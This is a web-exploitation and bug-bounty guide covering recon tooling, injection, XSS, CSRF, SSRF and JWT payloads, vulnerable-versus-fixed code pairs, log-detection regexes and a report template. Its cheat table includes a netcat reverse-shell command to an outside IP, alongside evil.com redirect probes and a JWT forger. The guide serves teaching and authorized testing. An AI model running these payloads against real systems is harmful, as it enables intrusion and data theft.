Web Exploitation & Bug Bounty Tactics — Recon, Exploit, Automate, Report
🧠 For authorized testing, bug bounty programs, and educational labs. This guide unifies web pentesting, CTF web exploitation, and real bug bounty workflows — from target reconnaissance to report-ready exploitation.
I. 🌍 Reconnaissance Phase
🔹 1. Passive Recon
Identify scope and subdomains without touching the target.
assetfinder example.com
subfinder -d example.com -all
amass enum -passive -d example.com
https://crt.sh/?q=%25.example.com (append &output=json for machine-readable results)
Enumerate DNS, WHOIS, and ASN:
whois example.com
dig any example.com (many resolvers answer ANY minimally; query A, AAAA, MX, NS and TXT individually if the answer looks thin)
dnsenum example.com
🔹 2. Active Recon
Resolve live hosts:
httprobe < subdomains.txt > alive.txt
httpx -l alive.txt -sc -title -tech-detect
(-sc is httpx's status-code flag; make sure the projectdiscovery binary, not the Python httpx package, is first in PATH)
Identify tech stack:
whatweb https://target.com
wappalyzer-cli https://target.com
Screenshot endpoints (for triage):
gowitness file -f alive.txt
🔹 3. Directory & Endpoint Discovery
ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200,204,301,302,307,403
dirsearch -u https://target.com -e php,aspx,js,txt
🧠 Pro tip: Focus on hidden admin panels, backup files (.bak, .old, .zip) and APIs — that’s where CTF flags and bounties hide.
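Passive sources return certificates, not hostnames, so the first real step is turning that output into a clean in-scope target list. The script below is an added example (not part of the original page): it parses JSON shaped like crt.sh's output (a constructed sample is embedded), folds wildcard names onto their base, drops look-alike hosts such as legacy.example.com.attacker.net that end-with-matching would accept, and honours an exclusion list for out-of-scope subdomains. The root domain and exclusions are assumptions for the demo.

```python
import json
import re
from typing import List, Set

# Constructed sample shaped like the JSON crt.sh returns for
# https://crt.sh/?q=%25.example.com&output=json: one record per certificate,
# "name_value" holding one or more newline-separated SAN entries.
CRTSH_SAMPLE = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "www.example.com\nexample.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "*.dev.example.com\nDEV.example.com"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "name_value": "api.example.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "legacy.example.com.attacker.net"},   # contains the root, is not under it
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "staging.internal.example.com"},
])

# Syntactically valid lowercase hostname: labels of 1-63 chars, alnum TLD.
HOSTNAME_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$")


def in_scope(host: str, root: str, exclude: Set[str]) -> bool:
    """True when host is root itself or a subdomain of root and is not excluded.

    Matching on '.' + root (not a bare substring) is what keeps
    legacy.example.com.attacker.net out of the list.
    """
    host = host.lower()
    if host != root and not host.endswith("." + root):
        return False
    return not any(host == ex or host.endswith("." + ex) for ex in exclude)


def parse_crtsh(payload: str, root: str, exclude: Set[str] = frozenset()) -> List[str]:
    """Return sorted, deduplicated, in-scope hostnames from crt.sh JSON.

    A wildcard entry (*.dev.example.com) is recorded as its base name: the
    wildcard is not a resolvable host, but it proves the base label exists
    and is worth brute-forcing under.
    """
    names: Set[str] = set()
    for record in json.loads(payload):
        for raw in record.get("name_value", "").split("\n"):
            name = raw.strip().lower()
            if name.startswith("*."):
                name = name[2:]
            if HOSTNAME_RE.match(name) and in_scope(name, root, exclude):
                names.add(name)
    return sorted(names)


if __name__ == "__main__":
    for host in parse_crtsh(CRTSH_SAMPLE, "example.com", exclude={"internal.example.com"}):
        print(host)
```

Feed the result straight into httpx/httprobe; anything the exclusion list removed never gets touched, which is the point of doing scope filtering before active recon rather than after.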
II. 💉 Injection Vulnerabilities
SQL Injection
' OR 1=1-- -
Test login forms, parameters (MySQL needs whitespace after --, hence "-- -" or "#"; PostgreSQL, MSSQL and SQLite accept a bare --)
Blind SQLi
1' AND SLEEP(5)-- -
Time-based testing (SLEEP() is MySQL; use pg_sleep(5) on PostgreSQL, WAITFOR DELAY '0:0:5' on MSSQL)
Command Injection
; id # or && whoami
Test upload, ping, diagnostic pages
File Inclusion
../../../../etc/passwd
LFI, RFI, php://filter tricks
Template Injection (SSTI)
{{7*7}}, ${7*7}, <%= 7*7 %>
Jinja2/Twig, Java EL/FreeMarker, ERB; a rendered 49 confirms server-side evaluation
XXE Injection
Custom XML payloads
Extract /etc/passwd, SSRF via XML
Deserialization
pickle.loads() / ObjectInputStream
Identify serialized input fields
🧠 Always inspect request parameters, headers, and hidden form fields.
III. 🔐 Authentication & Access Control
🔹 Common Flaws
Default creds →
admin:admin
Weak tokens / predictable session IDs
Missing logout or session expiry
JWT manipulation (alg:none, algorithm confusion, base64 payload tampering)
Password reset token reuse
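The alg:none flaw is a verifier that lets the token's own header decide whether a signature is needed. The following is an added example (not from the original page) using only the standard library: a legitimate HS256 token is minted, the claims are rewritten with alg set to none and the signature dropped, and the forgery is fed to a verifier that trusts the header and to one that pins the algorithm server-side. The secret and claims are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

SECRET = b"server-side-hs256-key"   # constructed; a real key never reaches the client


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign_hs256(claims: dict, key: bytes) -> str:
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"


def forge_alg_none(token: str, new_claims: dict) -> str:
    """Attacker step: reuse the real claims, change what matters, set alg to
    none and leave the signature segment empty."""
    claims = json.loads(b64url_decode(token.split(".")[1]))
    claims.update(new_claims)
    header = b64url(json.dumps({"alg": "none", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url(json.dumps(claims, separators=(",", ":")).encode())
    return f"{header}.{body}."


def verify_vulnerable(token: str, key: bytes) -> Optional[dict]:
    """Trusts the alg the client chose: 'none' means 'no signature required'."""
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg", "").lower() == "none":
        return json.loads(b64url_decode(body_b64))
    expected = hmac.new(key, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return json.loads(b64url_decode(body_b64))
    return None


def verify_fixed(token: str, key: bytes) -> Optional[dict]:
    """Pins the algorithm server-side and compares signatures in constant time."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
    except (ValueError, json.JSONDecodeError):
        return None
    if header.get("alg") != "HS256":      # rejects none and RS256/HS256 confusion alike
        return None
    expected = hmac.new(key, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(body_b64))


if __name__ == "__main__":
    legit = sign_hs256({"sub": "alice", "role": "user"}, SECRET)
    forged = forge_alg_none(legit, {"role": "admin"})
    print("vulnerable verifier:", verify_vulnerable(forged, SECRET))
    print("fixed verifier:     ", verify_fixed(forged, SECRET))
```

Libraries differ in how they spell the header ("none", "None", "NONE"), so when probing a real verifier try the case variants too; the fixed version above never looks at the header's value except to reject anything that is not the one algorithm it expects.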
🔹 Testing
jwt_tool <token>                      # decode header and claims
jwt_tool <token> -X a                 # alg:none attack variants
jwt_tool <token> -C -d wordlist.txt   # crack a weak HS256 secret
jwt_tool <token> -S hs256 -p secret   # re-sign with a recovered or guessed secret
wfuzz -c -z file,users.txt -z file,pass.txt -u https://target/login -d "username=FUZZ&password=FUZ2Z"
IV. ⚙️ File Upload Vulnerabilities
Basic Upload
Upload .php renamed as .png
Look for double extensions
Bypass filters
shell.pHp, shell.php%00.jpg
Case bypass of a lowercase denylist; null-byte truncation only works on legacy stacks (PHP < 5.3.4)
Client-side only checks
Modify via Burp Repeater
JS validation bypass
Image Polyglot
JPEG + PHP payload
Exploit misconfigured interpreters
🧠 Common Upload Paths
/uploads/
/images/
/files/
/user_content/
→ Try accessing uploaded files directly.
V. 🌐 Client-Side Attacks
🔹 Cross-Site Scripting (XSS)
Reflected
<script>alert(1)</script>
Stored
Comment fields, message boxes
DOM-based
#<img src=x onerror=alert(1)>
CSP Bypass
<svg onload=alert(1)> only fires if the policy permits inline handlers; against a real policy look for allowlisted JSONP endpoints (callback= injection) or a whitelisted CDN hosting AngularJS
💡 Automate scanning:
dalfox file urls.txt -b your.xss.report
🔹 CSRF (Cross-Site Request Forgery)
Check for missing CSRF tokens, absent Origin/Referer validation, and the session cookie's SameSite attribute (SameSite=Lax or Strict blocks a cross-site POST like the one below).
Try auto-submit forms:
<form action="https://target/change_password" method="POST">
<input type="hidden" name="password" value="pwned">
<script>document.forms[0].submit()</script>
</form>
🔹 Open Redirects
Test parameters like redirect=, next=, url=:
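Knowing what the server-side check usually looks like tells you which probes to send. Below is an added example (not from the original page): the "starts with / or with our own origin" check that most open redirects boil down to, next to a hardened version that accepts only an absolute path on the application's origin, both run over a constructed set of probes (scheme-relative, backslash, host-prefix, userinfo, javascript: and tab-smuggling variants). The host name is an assumption for the demo.

```python
from typing import Dict
from urllib.parse import urlsplit

OUR_HOST = "target.com"   # constructed: the application's own host

# Constructed probes for redirect=/next=/url= parameters.
PROBES = [
    "/account?tab=security",             # legitimate relative target
    "https://evil.com",                  # bare external URL
    "//evil.com",                        # scheme-relative
    "/\\evil.com",                       # backslash: browsers normalise to //evil.com
    "https://target.com.evil.com/",      # prefix-matched host
    "https://target.com@evil.com/",      # userinfo trick
    "javascript:alert(1)",               # URI scheme abuse
    "/\t/evil.com",                      # tab stripped by browsers -> //evil.com
    "////evil.com",
]


def redirect_vulnerable(next_url: str) -> str:
    """The check most often found in the wild: 'starts with / or with our origin'."""
    if next_url.startswith("/") or next_url.startswith(f"https://{OUR_HOST}"):
        return next_url
    return "/"


def redirect_fixed(next_url: str) -> str:
    """Accept only an absolute path on our own origin; fall back to / otherwise.

    Control characters and backslashes are rejected outright because browsers
    strip or rewrite them before parsing, so a value that looks like a path
    to the server can become a host to the client.
    """
    if any(ord(c) < 0x20 or c == "\\" for c in next_url):
        return "/"
    parts = urlsplit(next_url)
    if parts.scheme or parts.netloc:                   # any scheme or host means external
        return "/"
    if not parts.path.startswith("/") or parts.path.startswith("//"):
        return "/"
    return parts.path + (f"?{parts.query}" if parts.query else "")


def audit(redirect_fn) -> Dict[str, str]:
    """Map each probe to where the given redirect logic would send the user."""
    return {probe: redirect_fn(probe) for probe in PROBES}


if __name__ == "__main__":
    for probe, dest in audit(redirect_vulnerable).items():
        print(f"vulnerable: {probe!r:34} -> {dest!r}")
    for probe, dest in audit(redirect_fixed).items():
        print(f"fixed:      {probe!r:34} -> {dest!r}")
```

If a target rejects //evil.com but not /\evil.com, it is filtering by string rather than by parsed URL, and the same gap usually exists for the tab and userinfo variants.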
https://target.com/login?redirect=https://evil.com
VI. 🧱 Server-Side Exploits
SSRF
url=http://127.0.0.1:8080/admin
Access internal services
File Inclusion
page=../../../../etc/passwd
LFI/RFI
XXE
Inject XML with external entity
File read / SSRF
Deserialization
pickle.loads / php unserialize
RCE
🧠 Classic chain (CTF and cloud alike): SSRF → internal admin portal or cloud metadata endpoint (169.254.169.254) → credentials or an unauthenticated internal API → RCE. The metadata service hands you credentials, not code execution; the RCE comes from what those credentials or the internal service let you reach next.
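The SSRF row above lists one payload; real filters fall to the address forms they do not normalise. The following is an added example (not from the original page) of a destination check for a URL-fetching feature: it accepts only http/https, rejects userinfo tricks, parses the shorthand IPv4 literals that fetch libraries happily connect to (127.1, 2130706433, 0x7f000001), unwraps IPv4-mapped IPv6, and blocks loopback, RFC 1918, link-local (the metadata range) and similar networks. Hostnames are returned as "resolve" because a safe check has to resolve once, re-check the answer, and connect to that exact address so a DNS rebind between check and use cannot swap in an internal one. The network list and the name denylist are assumptions for the demo.

```python
import ipaddress
from typing import Optional, Union
from urllib.parse import urlsplit

IPAddr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]

BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]


def parse_ip_literal(host: str) -> Optional[IPAddr]:
    """Parse the address forms a fetcher will connect to, including the
    inet_aton shorthand that ipaddress rejects: 127.1, 2130706433, 0x7f000001."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    nums = []
    for part in host.split("."):
        try:
            if part.lower().startswith("0x"):
                nums.append(int(part, 16))
            elif len(part) > 1 and part.startswith("0"):
                nums.append(int(part, 8))           # leading zero means octal to inet_aton
            else:
                nums.append(int(part, 10))
        except ValueError:
            return None                             # not an IP literal: treat as a hostname
    if not 1 <= len(nums) <= 4 or any(n < 0 for n in nums):
        return None
    value = 0
    for n in nums[:-1]:                             # leading parts are single octets...
        if n > 255:
            return None
        value = (value << 8) | n
    remaining = 4 - (len(nums) - 1)
    if nums[-1] >= 1 << (8 * remaining):            # ...the last part fills whatever is left
        return None
    return ipaddress.IPv4Address((value << (8 * remaining)) | nums[-1])


def classify_fetch_target(url: str) -> str:
    """Return 'block', 'allow', or 'resolve' for a user-supplied fetch URL.

    'resolve' means: resolve the hostname once, run the resolved address back
    through this function, and connect to that IP rather than to the name.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):       # no file://, gopher://, dict://
        return "block"
    host = parts.hostname
    if not host or parts.username is not None:      # http://trusted.example.com@127.0.0.1/
        return "block"
    host = host.lower()
    if host == "localhost" or host.endswith((".localhost", ".internal")):
        return "block"
    ip = parse_ip_literal(host)
    if ip is None:
        return "resolve"
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped                         # [::ffff:127.0.0.1]
    return "block" if any(ip in net for net in BLOCKED_NETS) else "allow"


if __name__ == "__main__":
    for u in ("http://127.1/", "http://2130706433/", "http://[::ffff:127.0.0.1]/",
              "http://169.254.169.254/latest/meta-data/", "https://example.com/feed.xml"):
        print(f"{u:45} {classify_fetch_target(u)}")
```

When testing, the same list doubles as your bypass checklist: every form this function has to normalise is a form a weaker filter may miss, and redirects from an allowed host to an internal one need the check re-applied on each hop.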
VII. 🧰 Automation & Toolchains
Burp Suite / OWASP ZAP
Manual web proxy & fuzzing
ffuf / gobuster / dirsearch
Directory and param brute-forcing
httpx / nuclei
Automated tech & vuln scanning
sqlmap
SQLi automation
x8 / dalfox
XSS detection
nuclei templates
Reusable vulnerability signatures
arjun
Hidden parameter discovery
wfuzz
Parameter fuzzing
jwt_tool / jwt-cracker
Token tampering
whatweb / wappalyzer
Tech stack enumeration
🧠 Integrate with bash pipelines:
subfinder -d target.com | httpx -silent | nuclei -t vulnerabilities/
VIII. 🧩 API & Mobile Backends
Excessive Data Exposure
/api/v1/users returns full objects
Mass Assignment
JSON injection → add admin=true
Broken Auth
Missing tokens or session validation
Rate Limiting
Test 429 / lockout behavior
GraphQL
{"query":"{__schema{types{name}}}"} for introspection
Tools: Postman, Insomnia, Burp, graphqlmap.
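Mass assignment and excessive data exposure are two sides of the same mistake: the API maps the whole object to and from JSON. The code below is an added example (not from the original page): a profile-update handler that binds every JSON key onto the user model, a hardened one that allowlists and type-checks writable fields, and a response serialiser that exposes an explicit field list. The request body that adds admin=true is constructed, as is the User model.

```python
import json
from dataclasses import dataclass
from typing import Any, Dict


@dataclass
class User:
    id: int
    email: str
    display_name: str
    is_admin: bool = False
    email_verified: bool = False
    password_hash: str = "$argon2id$constructed"


# Constructed request bodies: the second adds fields the UI never sends.
BENIGN_BODY = json.dumps({"display_name": "Mallory"})
MALICIOUS_BODY = json.dumps({"display_name": "Mallory", "is_admin": True, "email_verified": True})

# Fields a user may write about themselves, with the type each must have.
WRITABLE: Dict[str, type] = {"display_name": str, "email": str}
# Fields the API may return to other users.
PUBLIC_FIELDS = ("id", "display_name")


def update_profile_vulnerable(user: User, body: str) -> User:
    """Mass assignment: every key in the JSON that names an attribute is bound."""
    for key, value in json.loads(body).items():
        if hasattr(user, key):
            setattr(user, key, value)
    return user


def update_profile_fixed(user: User, body: str) -> User:
    """Bind only allowlisted fields, type-check them, and reject anything else
    loudly so the attempt shows up in logs rather than being silently dropped."""
    payload = json.loads(body)
    unknown = set(payload) - set(WRITABLE)
    if unknown:
        raise ValueError(f"fields not writable: {sorted(unknown)}")
    for key, value in payload.items():
        if not isinstance(value, WRITABLE[key]):
            raise ValueError(f"{key} must be {WRITABLE[key].__name__}")
        setattr(user, key, value)
    if "email" in payload:
        user.email_verified = False      # a changed address must be re-verified
    return user


def public_view(user: User) -> Dict[str, Any]:
    """Excessive-data-exposure fix: serialise an explicit allowlist, never the object."""
    return {field: getattr(user, field) for field in PUBLIC_FIELDS}


if __name__ == "__main__":
    victim = User(id=7, email="m@example.com", display_name="mallory")
    print("vulnerable:", update_profile_vulnerable(victim, MALICIOUS_BODY))
    safe = User(id=7, email="m@example.com", display_name="mallory")
    try:
        update_profile_fixed(safe, MALICIOUS_BODY)
    except ValueError as exc:
        print("fixed:", exc)
    print("public view:", public_view(safe))
```

When probing, take the full object the GET endpoint leaks (the excessive-data-exposure finding) and send it back on the PUT/PATCH with one privileged field flipped; the two bugs are usually found and reported together.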
IX. 🧠 Bug Bounty Methodology
Recon
amass, subfinder, httpx
Live targets
Automation
ffuf, nuclei
Vulnerable endpoints
Manual testing
Burp / browser
Proof of Concept
Validation
Screenshot, payload confirmation
Reproducible exploit
Reporting
Clear writeup
Reward-worthy report
🧩 Always include:
Target URL & request details
Impact summary
Step-by-step reproduction
Fix recommendation
X. 🧠 Reporting Template
Title: Reflected XSS on example.com in login.php
Severity: Medium (the usual baseline for reflected XSS; raise to High only if the report demonstrates session takeover or an admin-only impact)
Description:
The `redirect` parameter on the login page is written into a client-side redirect without scheme validation, so a `javascript:` URI executes arbitrary JavaScript in the victim's origin.
Steps to Reproduce:
1. Navigate to:
https://example.com/login?redirect=javascript:alert(1)
2. Observe the alert pop-up.
Impact:
An attacker can steal session cookies or perform actions on behalf of users.
Recommendation:
Allow only same-origin relative paths for `redirect`, apply context-aware output encoding, and add a CSP as defense in depth.
Proof of Concept:
<insert screenshot or video>
XI. ⚙️ Cheat Reference Table
SQLi
' OR '1'='1'--
Command Injection
; nc -e /bin/sh 10.10.14.2 4444
LFI
../../../../etc/passwd
SSTI
{{7*7}}
XSS
<svg onload=alert(1)>
SSRF
http://127.0.0.1:8080/admin
Deserialization
PHP: O:1:"A":1:{s:1:"b";s:3:"pwn";}
XII. 🔒 Blue-Team / Detection Hints
SQLi
IDS/IPS regex on ' OR, UNION SELECT
XSS
WAF signatures on script tags and event handlers; output encoding is the fix, not the detection
SSRF
Logs showing 169.254.x.x / localhost requests
File Upload
MIME mismatch / signature mismatch alerts
Command Injection
Web server worker spawning bash, curl, wget or nc (process-tree and audit logs)
CSRF
Missing CSRF tokens flagged by scanners
JWT Abuse
Spikes in signature failures or alg:none headers; a token presented after logout or rotation
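Most of the hints above reduce to running signatures over URL-decoded request lines. The following is an added example (not from the original page) that does exactly that over a constructed access log: it decodes the request target twice (so double encoding does not evade the rules), then applies triage regexes for SQLi, command injection, LFI, SSRF to loopback or metadata addresses, and SSTI probes, returning which rule fired on which line. The log lines, client IPs (TEST-NET ranges) and rule set are constructed for the demo; treat hits as triage candidates, not confirmation.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote_plus

# Constructed combined-format access log (client IPs from TEST-NET ranges).
ACCESS_LOG = """\
203.0.113.5 - - [10/Oct/2025:12:00:01 +0000] "GET /item?id=1%27%20OR%201%3D1--%20- HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2025:12:00:02 +0000] "GET /item?id=1%27%20AND%20SLEEP(5)--%20- HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2025:12:00:03 +0000] "GET /ping?host=8.8.8.8%3Bid HTTP/1.1" 200 77 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2025:12:00:04 +0000] "GET /page?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2025:12:00:05 +0000] "GET /fetch?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F HTTP/1.1" 200 300 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2025:12:00:06 +0000] "GET /search?q=%7B%7B7*7%7D%7D HTTP/1.1" 200 300 "-" "curl/8.0"
198.51.100.7 - - [10/Oct/2025:12:00:07 +0000] "GET /search?q=ssrf+article HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# client, ident, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) ')

# Signatures applied to the decoded request target. Triage rules only:
# confirm with the application log and the response size before acting.
RULES = {
    "sqli": re.compile(r"'\s*(or|and)\s+[\w']+\s*=|union\s+(all\s+)?select|sleep\(\d+\)|pg_sleep\(|waitfor\s+delay", re.I),
    "cmdi": re.compile(r"[;&|`]\s*(id|whoami|cat|curl|wget|nc|bash|sh)\b", re.I),
    "lfi":  re.compile(r"(\.\./){2,}|/etc/passwd|php://filter", re.I),
    "ssrf": re.compile(r"=\s*(https?://)?(127\.\d+\.\d+\.\d+|localhost|169\.254\.\d+\.\d+|\[::1\]|0x7f[0-9a-f]{6}|2130706433)", re.I),
    "ssti": re.compile(r"\{\{\s*\d+\s*\*\s*\d+\s*\}\}|\$\{\s*\d+\s*\*\s*\d+\s*\}"),
}


def decode_target(target: str) -> str:
    """Decode twice so %2527-style double encoding does not slip past the rules."""
    for _ in range(2):
        target = unquote_plus(target)
    return target


def scan_log(log_text: str) -> List[Tuple[int, str, str, str]]:
    """Return (line_no, client_ip, rule, decoded_target) for every rule that fires."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue                                 # malformed line: skip, do not crash
        client_ip, _ts, _method, target, _status = m.groups()
        decoded = decode_target(target)
        for rule, pattern in RULES.items():
            if pattern.search(decoded):
                hits.append((line_no, client_ip, rule, decoded))
    return hits


if __name__ == "__main__":
    for line_no, ip, rule, decoded in scan_log(ACCESS_LOG):
        print(f"line {line_no}: {ip} [{rule}] {decoded}")
```

Grouping the hits by client address is the next step: one source tripping five different rules in six seconds is a scanner, which is a different response from a single SSRF hit against the metadata address.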
XIII. 🧰 Quick Automation Script (Recon → Scan)
#!/usr/bin/env bash
set -euo pipefail
domain=example.com
subfinder -d "$domain" -o subs.txt
httpx -l subs.txt -silent -o live.txt
nuclei -l live.txt -t cves/ -o findings.txt